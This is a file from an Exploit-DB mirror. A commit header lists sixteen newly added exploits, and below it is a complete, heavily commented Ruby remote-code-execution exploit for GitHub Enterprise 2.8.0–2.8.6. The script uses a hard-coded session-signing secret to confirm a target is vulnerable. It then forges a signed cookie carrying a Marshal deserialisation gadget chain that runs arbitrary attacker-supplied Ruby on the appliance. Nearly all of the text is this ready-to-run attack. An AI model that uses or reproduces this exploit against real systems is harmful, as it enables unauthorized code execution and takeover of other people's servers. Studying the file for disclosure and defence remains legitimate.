exploit-db-mirror/platforms/ruby/webapps/41616.rb
Offensive Security 66117c63f5 DB: 2017-03-16
16 new exploits

Adobe Flash - Metadata Parsing Out-of-Bounds Read
Adobe Flash - MovieClip Attach init Object Use-After-Free
Adobe Flash - ATF Thumbnailing Heap Overflow
Adobe Flash - ATF Planar Decompression Heap Overflow
Adobe Flash - AVC Header Slicing Heap Overflow
Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow

USBPcap - Privilege Escalation
USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation
Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)

Cisco Firepower Management Console 6.0 - Post Authentication UserAdd
Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)
IBM WebSphere - RCE Java Deserialization (Metasploit)
Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)
Joomla! Component Vik Appointments 1.5 - SQL Injection
Joomla! Component Vik Rent Items 1.3 - SQL Injection
Joomla! Component Vik Rent Car 1.11 - SQL Injection
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution
Steam Profile Integration 2.0.11 - SQL injection
Sitecore CMS 8.1 Update-3 - Cross-Site Scripting
2017-03-16 05:01:20 +00:00


#!/usr/bin/ruby
require "openssl"
require "cgi"
require "net/http"
require "uri"
# HMAC-SHA1 key used twice below: to verify the `_gh_manage` cookie the target
# sets (the vulnerability check) and to sign the forged session cookie. The
# exploit only works against a console that signs sessions with this exact value.
SECRET = '641dd6454584ddabfed6342cc66281fb'.freeze
# ASCII banner; kept verbatim because the single-quoted escapes are part of the art.
puts ' ___. .__ '
puts ' ____ ___ ________ \_ |__ | | __ __ ____ '
puts '_/ __ \\\\ \/ /\__ \ | __ \| | | | \_/ __ \ '
puts '\ ___/ > < / __ \| \_\ \ |_| | /\ ___/ '
puts ' \___ >__/\_ \(____ /___ /____/____/ \___ >'
puts ' \/ \/ \/ \/ \/ '
puts ''

# Title block: puts prints one array element per line.
puts [
  'github Enterprise RCE exploit',
  'Vulnerable: 2.8.0 - 2.8.6',
  '(C) 2017 iblue <iblue@exablue.de>'
]

# Both a target host and a Ruby snippet are mandatory. ARGV entries are never
# nil, so a length check is the same test as ARGV[0] && ARGV[1]; exit non-zero
# so a wrapper script notices the misuse.
if ARGV.length < 2
  puts [
    'Usage: ./exploit.rb <hostname> <valid ruby code>',
    '',
    'Example: ./exploit.rb ghe.example.org "%x(id > /tmp/pwned)"'
  ]
  exit 1
end
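hostname = ARGV[0]
code = ARGV[1] # Ruby source that will be evaluated on the appliance, not locally

# First we get the cookie from the host to check if the instance is vulnerable.
# The management console is expected on 8443 over TLS. Certificate checks are
# disabled because appliances commonly run self-signed certificates; that is
# acceptable here only because nothing secret is sent in this probe.
puts "[+] Checking if #{hostname} is vulnerable..."
http = Net::HTTP.new(hostname, 8443)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE # We may deal with self-signed certificates

# Follow redirects on the same connection (same host/port), but bound them:
# the original loop had no limit, so a host answering with a redirect cycle
# would spin forever. A redirect without a Location header is also handled
# instead of raising from Net::HTTP::Get.new(nil).
MAX_REDIRECTS = 10
redirects = 0
rqst = Net::HTTP::Get.new("/")
res = http.request(rqst)
while res.is_a?(Net::HTTPRedirection)
  redirects += 1
  if redirects > MAX_REDIRECTS
    puts " => Gave up after #{MAX_REDIRECTS} redirects"
    exit 1
  end
  location = res["location"]
  unless location
    puts " => Redirect without a Location header, giving up"
    exit 1
  end
  puts " => Following redirect to #{location}..."
  rqst = Net::HTTP::Get.new(location)
  res = http.request(rqst)
end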
# Report a negative result and stop. Every failed check in the probe ends here;
# exit status 1 lets a calling script tell "not vulnerable" from success.
def not_vulnerable
  $stdout.puts ' => Host is not vulnerable'
  Kernel.exit(1)
end
# Only the management console is expected to set a "_gh_manage" cookie; anything
# else answering on 8443 is reported as not vulnerable. start_with? is the same
# test as /\A_gh_manage/, and to_s makes a missing header a plain mismatch.
not_vulnerable unless res['Set-Cookie'].to_s.start_with?('_gh_manage')

# Parse the cookie. Expected shape: "_gh_manage=<payload>--<hex hmac>; attrs".
# Recomputing HMAC-SHA1 over the payload with the well-known SECRET and
# comparing it to the server's signature shows whether the target signs its
# sessions with that key -- if it does, it will also trust a cookie we sign.
# Any malformed value (no "--", no "=", bad escaping) is treated as not
# vulnerable rather than a stack trace; that is why StandardError is swallowed.
begin
  cookie_value = res['Set-Cookie'].split('=', 2)[1]
  segments = cookie_value.split('--')
  payload = CGI.unescape(segments.first)
  signature = segments.last.split(';', 2).first
  computed = OpenSSL::HMAC.hexdigest('SHA1', SECRET, payload)
  not_vulnerable unless computed == signature
rescue StandardError
  not_vulnerable
end
puts ' => Host is vulnerable'
# Now construct the cookie
puts "[+] Assembling magic cookie..."

# Stubs, since we don't want to execute the code locally. Marshal.dump records
# only the constant path and the instance variables of each object, so empty
# classes with the right names are enough; the target's real classes take over
# when it Marshal.loads the cookie (this is the deserialisation gadget chain).
module Erubis; class Eruby; end; end
module ActiveSupport; module Deprecation; class DeprecatedInstanceVariableProxy; end; end; end

# Allocate a bare instance of klass (no initialize) and set its ivars in the
# given order. The order is kept stable because it is what Marshal serialises.
build = lambda do |klass, ivars|
  obj = klass.allocate
  ivars.each { |name, val| obj.instance_variable_set(name, val) }
  obj
end

# Eruby#result evaluates @src; the proxy forwards @method to @instance on load.
template = build.call(Erubis::Eruby, { :@src => "#{code}; 1" })
proxy = build.call(
  ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy,
  { :@instance => template, :@method => :result, :@var => "@result" }
)
session = { "session_id" => "", "exploit" => proxy }

# Marshal session. pack("m") is kept exactly as the original (base64 with line
# breaks), since the signature is computed over this precise string and must
# match whatever encoding the target's cookie verifier expects.
payload = [Marshal.dump(session)].pack("m")
signature = OpenSSL::HMAC.hexdigest("SHA1", SECRET, payload)

puts "[+] Sending cookie..."
rqst = Net::HTTP::Get.new("/")
rqst["Cookie"] = "_gh_manage=#{CGI.escape("#{payload}--#{signature}")}"
res = http.request(rqst)

# A 302 is taken as "the cookie was accepted" -- a heuristic, not proof that
# the supplied Ruby actually ran; verify the side effect on the target.
puts(res.code == "302" ? " => Code executed." : " => Something went wrong.")